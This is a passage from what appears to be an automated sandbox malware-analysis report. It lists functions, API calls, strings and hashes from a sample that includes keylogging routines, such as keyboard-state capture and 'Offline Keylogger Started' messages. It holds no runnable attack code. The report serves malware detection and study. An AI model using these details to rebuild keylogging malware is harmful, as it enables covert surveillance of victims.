                                                    • Opcode ID: d5d954fb0f0c9e72c750adb050d950d10707b21acc7484b3c297080a871ff971
                                                    • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                                                    • Opcode Fuzzy Hash: d5d954fb0f0c9e72c750adb050d950d10707b21acc7484b3c297080a871ff971
                                                    • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                                                    Function 0044486F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 147COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __alloca_probe_16__freea
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1635606685-3232713500
                                                    • Opcode ID: eac9a9426b859d549b8c771f6175b2612c156b0394b9bd2443c31435fe95e641
                                                    • Instruction ID: d75caf07e15c6e9c25109d2fa9d862a365d6db0812c2ca845bedc3adbab73c0f
                                                    • Opcode Fuzzy Hash: eac9a9426b859d549b8c771f6175b2612c156b0394b9bd2443c31435fe95e641
                                                    • Instruction Fuzzy Hash: 9041E3B1A10612ABFB20AF75CC42B5F77A4AF85764B24452BF804CB281EB7CD840D699
                                                    Function 00441799 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 130fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004417E0
                                                    • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00441860
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileReadUnothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: Zb1Y/
                                                    • API String ID: 1834446548-3232713500
                                                    • Opcode ID: c96d12722c41e80bc005880b88915f851d74d10f7724423d8250eeb53ec0c138
                                                    • Instruction ID: 0a473f409c7cd7377dd7a5f5dab724c995486947421702620f7eb370090a111b
                                                    • Opcode Fuzzy Hash: c96d12722c41e80bc005880b88915f851d74d10f7724423d8250eeb53ec0c138
                                                    • Instruction Fuzzy Hash: F841F371B00159ABFB21DF24CC80BE9B7B5EB48305F1481EAE54997261EB78DEC1CB58
                                                    Function 004496D8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __cftof
                                                    • String ID: Zb1Y/$BG3i@
                                                    • API String ID: 1622813385-1304149209
                                                    • Opcode ID: 0e53b18c89b8a5a252250ce90d767f597698ce4f8bbb56296b0f5e4f7aee30ca
                                                    • Instruction ID: 26bf2f3233374fa186826d58430ca3572f9c3fe9a4167e0feab9d0bc8a975567
                                                    • Opcode Fuzzy Hash: 0e53b18c89b8a5a252250ce90d767f597698ce4f8bbb56296b0f5e4f7aee30ca
                                                    • Instruction Fuzzy Hash: 9D318532424115EAF7146E799CC697FB768DE42734724021FF824AA2E5EA2CDC43A35D
                                                    Function 004508EE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00450B49,?,00000050,?,?,?,?,?), ref: 004509C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ACP$OCP
                                                    • API String ID: 0-711371036
                                                    • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                    • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                                    • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                    • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                                                    Function 0044A448 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0044A885,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A4F2
                                                    • GetLastError.KERNEL32(?,0044A885,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9D4,?,00475B90,?,?,00000000,?), ref: 0044A51B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: Zb1Y/
                                                    • API String ID: 442123175-3232713500
                                                    • Opcode ID: d59acdf6c95f355294a896f4b2b1403a1d02454dc51f2891e607a6df93cdfbc6
                                                    • Instruction ID: cd5426a964089393316f085a69d27b844fa0fab8cfdcee6250a47b554045b157
                                                    • Opcode Fuzzy Hash: d59acdf6c95f355294a896f4b2b1403a1d02454dc51f2891e607a6df93cdfbc6
                                                    • Instruction Fuzzy Hash: 9A319E31B002199BCB24CF59DD809DAF3F5FF88325F1484AAE909D7260EA34ED91CB59
                                                    Function 0044A369 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77fileCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,0044A8A5,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A404
                                                    • GetLastError.KERNEL32(?,0044A8A5,?,00000000,00000000,00000000,00000000,0000000C,00000000,0043B9D4,?,00475B90,?,?,00000000,?), ref: 0044A42D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFileLastWrite
                                                    • String ID: Zb1Y/
                                                    • API String ID: 442123175-3232713500
                                                    • Opcode ID: f4908108f976f30314336d421f36b30058cab31412de2b9c2098902a93001b52
                                                    • Instruction ID: 1b7dfc4fd8252c4f70ec5e0e7467c1c2206f1e45e7655ea5bc65ddbf719a4850
                                                    • Opcode Fuzzy Hash: f4908108f976f30314336d421f36b30058cab31412de2b9c2098902a93001b52
                                                    • Instruction Fuzzy Hash: 8721B435A003189FDB14CF59DD80AE9B3F8EB48316F1004AAE94AD7251D774EE91CB25
                                                    Function 004049BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                    Strings
                                                    • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID: KeepAlive | Enabled | Timeout:
                                                    • API String ID: 481472006-1507639952
                                                    • Opcode ID: ea70252bfee1193fa070b6ce61b16917ee96d00f5fb0952583a0e38783224c42
                                                    • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                                                    • Opcode Fuzzy Hash: ea70252bfee1193fa070b6ce61b16917ee96d00f5fb0952583a0e38783224c42
                                                    • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                                                    Function 0041A696 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID: | $%02i:%02i:%02i:%03i
                                                    • API String ID: 481472006-2430845779
                                                    • Opcode ID: c1104856b329bac52de9abd69d1e93ca30ee683114df54cf724c85b3f010b06d
                                                    • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                                    • Opcode Fuzzy Hash: c1104856b329bac52de9abd69d1e93ca30ee683114df54cf724c85b3f010b06d
                                                    • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                                                    Function 00433D3C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004341AB
                                                    • ___raise_securityfailure.LIBCMT ref: 00434292
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                    • String ID: Zb1Y/
                                                    • API String ID: 3761405300-3232713500
                                                    • Opcode ID: 55f35760b53b456a169b3277dece2ce7442f289f493762303a99d350d49c20e8
                                                    • Instruction ID: 000d50625735e57a668df5ab79030095d4c62f70b6b07f505ba9975f41ccb453
                                                    • Opcode Fuzzy Hash: 55f35760b53b456a169b3277dece2ce7442f289f493762303a99d350d49c20e8
                                                    • Instruction Fuzzy Hash: 2F219CB5512300DAE760CF59F956B507BA4FB58314F14693AE90CCA3A1E3F4A9C1CB4D
                                                    Function 0040A767 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                      • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                    • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                    • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                    • String ID: Online Keylogger Stopped
                                                    • API String ID: 1623830855-1496645233
                                                    • Opcode ID: a6ae9b93d039332b163c31e72d4f3da944da033372009bc833185b2393ae89fc
                                                    • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                                    • Opcode Fuzzy Hash: a6ae9b93d039332b163c31e72d4f3da944da033372009bc833185b2393ae89fc
                                                    • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                                    Function 0044786D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 004478DE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: String
                                                    • String ID: LCMapStringEx$Zb1Y/
                                                    • API String ID: 2568140703-3907430070
                                                    • Opcode ID: 68bfb2a0323cd8b45511a9baf355383e686fac269e028269e4b923a5fcfd5390
                                                    • Instruction ID: 5219b2f0712111c97390e4ff23e733fc947035eeb900bf090804aeb4af3ba7b1
                                                    • Opcode Fuzzy Hash: 68bfb2a0323cd8b45511a9baf355383e686fac269e028269e4b923a5fcfd5390
                                                    • Instruction Fuzzy Hash: 16012932504209FBCF126F90DC05EEE7F62EF08715F004166FE0825161CB3A9971EB99
                                                    Function 00447525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDateFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004466E0,?,00000000,00401AD8), ref: 00447590
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DateFormat
                                                    • String ID: GetDateFormatEx$Zb1Y/
                                                    • API String ID: 2793631785-38510114
                                                    • Opcode ID: d62e718867faf438bf86df2b1a1f98fc255ebd42f653d41745076d328fd95ae1
                                                    • Instruction ID: ab836050a8a4d96a4137f497c5c7a97b28bdb08291dabd2d8b757e7a6f5b1b2a
                                                    • Opcode Fuzzy Hash: d62e718867faf438bf86df2b1a1f98fc255ebd42f653d41745076d328fd95ae1
                                                    • Instruction Fuzzy Hash: E6011A32A4420DFBCF125F91DC06E9E7F66EF08751F004465FE0826261CB7A9932EB99
                                                    Function 004016E8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
                                                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: wave$BufferHeaderPrepare
                                                    • String ID: T=G
                                                    • API String ID: 2315374483-379896819
                                                    • Opcode ID: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                    • Instruction ID: f8644d152c35c587af506687758c025c54344a6e575747702fe1289d7b8da532
                                                    • Opcode Fuzzy Hash: 0ff4070462d876ba9a0314f854ca9e5b2f4718fb39603aa566027c6b2d74496f
                                                    • Instruction Fuzzy Hash: 65018B71301300AFD7209F39EC45A69BBA9EB4931AF01413EB808D32B1EB34A8509B98
                                                    Function 00447667 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39timeCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTimeFormatW.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,004466E0,?,00000000,00401AD8), ref: 004476C0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FormatTime
                                                    • String ID: GetTimeFormatEx$Zb1Y/
                                                    • API String ID: 3606616251-4054105572
                                                    • Opcode ID: 5ad3e4583dadef9c7fb93e34cbd6412838cf64860adf33c24f1c20439ee08611
                                                    • Instruction ID: 7d64a893e991e4bdd9c49a345b7357b2fced44129d2f219bba29f3463069d641
                                                    • Opcode Fuzzy Hash: 5ad3e4583dadef9c7fb93e34cbd6412838cf64860adf33c24f1c20439ee08611
                                                    • Instruction Fuzzy Hash: 81F0C231A04208FBDF116F65DC06EAE7F26EF08715F00046AFC0466262CB398921ABDD
                                                    Function 004476D7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,004503BF,?,00000055,00000050), ref: 00447721
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DefaultUser
                                                    • String ID: GetUserDefaultLocaleName$Zb1Y/
                                                    • API String ID: 3358694519-3200787008
                                                    • Opcode ID: 3672e5463deaf5ea45bb47fb4b4115e18536fd74a669daa61855c36d412e2cd6
                                                    • Instruction ID: 6f3b3d2d52d18e2f500aa0c1bfc47f81cd3ef75b8d91e12febc6947054f763d3
                                                    • Opcode Fuzzy Hash: 3672e5463deaf5ea45bb47fb4b4115e18536fd74a669daa61855c36d412e2cd6
                                                    • Instruction Fuzzy Hash: 9EF02430A04208B7CB116F51DC06E9EBF64DF04725F00406AFC045A2A2CB799D1297DD
                                                    Function 00401D91 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID: T=G$T=G
                                                    • API String ID: 3519838083-3732185208
                                                    • Opcode ID: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                    • Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
                                                    • Opcode Fuzzy Hash: 138b4589fff14f79146b4c81e53a501c98e6cc4b2bf129928705b8782f8e57ab
                                                    • Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
                                                    Function 0044773E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044AC66,-00000020,00000FA0,00000000,00466608,00466608,00000000), ref: 00447789
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CountCriticalInitializeSectionSpin
                                                    • String ID: InitializeCriticalSectionEx$Zb1Y/
                                                    • API String ID: 2593887523-900377698
                                                    • Opcode ID: ba2e66625b1e639b92ffbfc2d6060421e95bbac502ea62ad06ade3e8b7a0989c
                                                    • Instruction ID: 3c73f8e9446f665a62cdb4c3a76b3fd0cb1533be68ae1e2d18ca0a0eecb3414f
                                                    • Opcode Fuzzy Hash: ba2e66625b1e639b92ffbfc2d6060421e95bbac502ea62ad06ade3e8b7a0989c
                                                    • Instruction Fuzzy Hash: 3AF0B431A4420DFBCB155F55DC05EAE7F61DF04722F4141AAFC0416261CF399E11D69D
                                                    Function 0040AD56 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyState.USER32(00000011), ref: 0040AD5B
                                                      • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
                                                      • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                      • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                      • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
                                                      • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
                                                      • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                      • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                      • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                    • String ID: [AltL]$[AltR]
                                                    • API String ID: 2738857842-2658077756
                                                    • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                    • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                    • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                    • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                    Function 004473CA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Alloc
                                                    • String ID: FlsAlloc$Zb1Y/
                                                    • API String ID: 2773662609-3761420814
                                                    • Opcode ID: e78667822f5e79ab7c14d9e4ecf03f3a03c6c70fe98cf5666842121660a76376
                                                    • Instruction ID: e3584e6e60b0ce1f897c1a630e1b5e88222358794527568605747e2193ee0655
                                                    • Opcode Fuzzy Hash: e78667822f5e79ab7c14d9e4ecf03f3a03c6c70fe98cf5666842121660a76376
                                                    • Instruction Fuzzy Hash: 1BE05530A8420AA7C315AB50AC03A2EFB54CF04B22F0005BAFC0413342CE388E0281EE
                                                    Function 00447420 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Free
                                                    • String ID: FlsFree$Zb1Y/
                                                    • API String ID: 3978063606-3460347783
                                                    • Opcode ID: eb267d74104736367ab5431944ac8927a785c50e3789802343b1094df18b8064
                                                    • Instruction ID: b0516f983214bd8ec60f21e98f60005bdb2fae5df38d207d6cd414e924573594
                                                    • Opcode Fuzzy Hash: eb267d74104736367ab5431944ac8927a785c50e3789802343b1094df18b8064
                                                    • Instruction Fuzzy Hash: A7E0E531F05218A7D3206F25AC02E7EBF94DF44B12F1000AAFD0557352CE784E0186DE
                                                    Function 00447611 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,004395E7), ref: 00447650
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Time$FileSystem
                                                    • String ID: GetSystemTimePreciseAsFileTime$Zb1Y/
                                                    • API String ID: 2086374402-2029436538
                                                    • Opcode ID: aedcab76af92cc4bc62ea73aa4e5c5ea7e51aa4d01cdec665397a9b648c5c9e1
                                                    • Instruction ID: 6139676006ac48b35b7740e26133f6a1f63f54bd9e261c6233ed86c194cf6258
                                                    • Opcode Fuzzy Hash: aedcab76af92cc4bc62ea73aa4e5c5ea7e51aa4d01cdec665397a9b648c5c9e1
                                                    • Instruction Fuzzy Hash: 62E0E531B46218A797206F25AC02E7FBB54DF14B22F5101BAFC0557352CE288D01A6DE
                                                    Function 00448813 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 00448835
                                                      • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                      • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast_free
                                                    • String ID: `@$`@
                                                    • API String ID: 1353095263-20545824
                                                    • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                    • Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
                                                    • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                    • Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
                                                    Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: State
                                                    • String ID: [CtrlL]$[CtrlR]
                                                    • API String ID: 1649606143-2446555240
                                                    • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                    • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                    • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                    • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                    Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                    Download Yara Rule
                                                    APIs
